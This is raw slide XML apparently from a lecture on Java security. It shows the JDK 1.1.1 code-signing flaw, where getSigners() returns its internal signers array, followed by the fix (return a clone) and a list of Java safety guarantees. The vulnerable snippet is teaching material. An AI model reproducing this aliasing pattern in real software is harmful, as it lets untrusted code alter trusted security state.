                <a:tab pos="9218613" algn="l"/>
                <a:tab pos="9759950" algn="l"/>
                <a:tab pos="10302875" algn="l"/>
                <a:tab pos="10845800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL"/>
              <a:t>Security flaw in code signing check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="2200"/>
              <a:t>(Magic Coat)</a:t>
            </a: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001D32BD-263A-8861-B807-7113EC507A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7238" y="1157288"/>
            <a:ext cx="8805862" cy="6248400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0"/>
              <a:t>Implementation of the class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-N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altLang="nl-NL" sz="1800" dirty="0"/>
              <a:t> in JDK1.1.1 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   package 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java.lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   public class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     private String[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>signers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     /** Obtain list of signers of given class */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     public String[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getSigners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         { return signers;   }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009900"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the bug ?   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" i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getSigners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> leaks reference to internal data structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009900"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How can it be fixed ?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" i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getSigners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> should clone the array and return  a clone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369888" indent="-369888" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009900"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="371475" algn="l"/>
                <a:tab pos="534988" algn="l"/>
                <a:tab pos="1077913" algn="l"/>
                <a:tab pos="1619250" algn="l"/>
                <a:tab pos="2162175" algn="l"/>
                <a:tab pos="2705100" algn="l"/>
                <a:tab pos="3246438" algn="l"/>
                <a:tab pos="3789363" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
                <a:tab pos="4875213" algn="l"/>
                <a:tab pos="5416550" algn="l"/>
                <a:tab pos="5959475" algn="l"/>
                <a:tab pos="6502400" algn="l"/>
                <a:tab pos="7043738" algn="l"/>
                <a:tab pos="7586663" algn="l"/>
                <a:tab pos="8129588" algn="l"/>
                <a:tab pos="8672513" algn="l"/>
                <a:tab pos="9213850" algn="l"/>
                <a:tab pos="9756775" algn="l"/>
                <a:tab pos="10299700" algn="l"/>
                <a:tab pos="10841038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Could it be prevented at language-level ?   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By having immutable arrays, or type system for alias control</a:t>
            </a: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DA5E601F-5598-E696-731C-1686791CCC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F2CBAF98-7BBA-45E4-B901-1B020B7C309C}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2989168541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5475-594A-BBDE-34E8-F83EC998C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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>hier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F701D-071F-4CFD-50F5-4AA5C9341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FE5C3-5C97-EEFC-63C3-D4B3FFF83A8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DF70789-C4F8-4BCF-B9A2-E0E34052E275}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>54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524085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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3E4DC95-FB3F-4E3B-D46D-6CCB47477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539750" algn="l"/>
                <a:tab pos="1082675" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="2166938" algn="l"/>
                <a:tab pos="2709863" algn="l"/>
                <a:tab pos="3252788" algn="l"/>
                <a:tab pos="3794125" algn="l"/>
                <a:tab pos="4337050" algn="l"/>
                <a:tab pos="4879975" algn="l"/>
                <a:tab pos="5422900" algn="l"/>
                <a:tab pos="5964238" algn="l"/>
                <a:tab pos="6507163" algn="l"/>
                <a:tab pos="7050088" algn="l"/>
                <a:tab pos="7591425" algn="l"/>
                <a:tab pos="8134350" algn="l"/>
                <a:tab pos="8677275" algn="l"/>
                <a:tab pos="9220200" algn="l"/>
                <a:tab pos="9761538" algn="l"/>
                <a:tab pos="10304463" algn="l"/>
                <a:tab pos="10847388" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0"/>
              <a:t>Java safety &amp; security guarantees</a:t>
            </a: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654406C6-9F2D-310D-0A52-F90F5DF58D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7238" y="1157288"/>
            <a:ext cx="8728075" cy="5557837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="372730" indent="-372730" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="372730" algn="l"/>
                <a:tab pos="535470" algn="l"/>
                <a:tab pos="1077939" algn="l"/>
                <a:tab pos="1620409" algn="l"/>
                <a:tab pos="2162878" algn="l"/>
                <a:tab pos="2705347" algn="l"/>
                <a:tab pos="3247817" algn="l"/>
                <a:tab pos="3790286" algn="l"/>
                <a:tab pos="4332755" algn="l"/>
                <a:tab pos="4875225" algn="l"/>
                <a:tab pos="5417694" algn="l"/>
                <a:tab pos="5960164" algn="l"/>
                <a:tab pos="6502633" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7587572" algn="l"/>
                <a:tab pos="8130041" algn="l"/>
                <a:tab pos="8672511" algn="l"/>
                <a:tab pos="9214980" algn="l"/>
                <a:tab pos="9757449" algn="l"/>
                <a:tab pos="10299919" algn="l"/>
                <a:tab pos="10842388" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memory safety</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="372730" indent="-372730" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="372730" algn="l"/>
                <a:tab pos="535470" algn="l"/>
                <a:tab pos="1077939" algn="l"/>
                <a:tab pos="1620409" algn="l"/>
                <a:tab pos="2162878" algn="l"/>
                <a:tab pos="2705347" algn="l"/>
                <a:tab pos="3247817" algn="l"/>
                <a:tab pos="3790286" algn="l"/>
                <a:tab pos="4332755" algn="l"/>
                <a:tab pos="4875225" algn="l"/>
                <a:tab pos="5417694" algn="l"/>
                <a:tab pos="5960164" algn="l"/>
                <a:tab pos="6502633" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7587572" algn="l"/>
                <a:tab pos="8130041" algn="l"/>
                <a:tab pos="8672511" algn="l"/>
                <a:tab pos="9214980" algn="l"/>
                <a:tab pos="9757449" algn="l"/>
                <a:tab pos="10299919" algn="l"/>
                <a:tab pos="10842388" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strong typing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="372730" indent="-372730" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="372730" algn="l"/>
                <a:tab pos="535470" algn="l"/>
                <a:tab pos="1077939" algn="l"/>
                <a:tab pos="1620409" algn="l"/>
                <a:tab pos="2162878" algn="l"/>
                <a:tab pos="2705347" algn="l"/>
                <a:tab pos="3247817" algn="l"/>
                <a:tab pos="3790286" algn="l"/>
                <a:tab pos="4332755" algn="l"/>
                <a:tab pos="4875225" algn="l"/>
                <a:tab pos="5417694" algn="l"/>
                <a:tab pos="5960164" algn="l"/>
                <a:tab pos="6502633" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7587572" algn="l"/>
                <a:tab pos="8130041" algn="l"/>
                <a:tab pos="8672511" algn="l"/>
                <a:tab pos="9214980" algn="l"/>
                <a:tab pos="9757449" algn="l"/>
                <a:tab pos="10299919" algn="l"/>
                <a:tab pos="10842388" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visibility restrictions     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL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altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL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altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="372730" indent="-372730" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="372730" algn="l"/>
                <a:tab pos="535470" algn="l"/>
                <a:tab pos="1077939" algn="l"/>
                <a:tab pos="1620409" algn="l"/>
                <a:tab pos="2162878" algn="l"/>
                <a:tab pos="2705347" algn="l"/>
                <a:tab pos="3247817" algn="l"/>
                <a:tab pos="3790286" algn="l"/>
                <a:tab pos="4332755" algn="l"/>
                <a:tab pos="4875225" algn="l"/>
                <a:tab pos="5417694" algn="l"/>
                <a:tab pos="5960164" algn="l"/>
                <a:tab pos="6502633" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7587572" algn="l"/>
                <a:tab pos="8130041" algn="l"/>
                <a:tab pos="8672511" algn="l"/>
                <a:tab pos="9214980" algn="l"/>
                <a:tab pos="9757449" algn="l"/>
                <a:tab pos="10299919" algn="l"/>
                <a:tab pos="10842388" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>immutable fields             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>using  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="372730" indent="-372730" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="372730" algn="l"/>
                <a:tab pos="535470" algn="l"/>
                <a:tab pos="1077939" algn="l"/>
                <a:tab pos="1620409" algn="l"/>
                <a:tab pos="2162878" algn="l"/>
                <a:tab pos="2705347" algn="l"/>
                <a:tab pos="3247817" algn="l"/>
                <a:tab pos="3790286" algn="l"/>
                <a:tab pos="4332755" algn="l"/>
                <a:tab pos="4875225" algn="l"/>
                <a:tab pos="5417694" algn="l"/>
                <a:tab pos="5960164" algn="l"/>
                <a:tab pos="6502633" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7587572" algn="l"/>
                <a:tab pos="8130041" algn="l"/>
                <a:tab pos="8672511" algn="l"/>
                <a:tab pos="9214980" algn="l"/>
                <a:tab pos="9757449" algn="l"/>
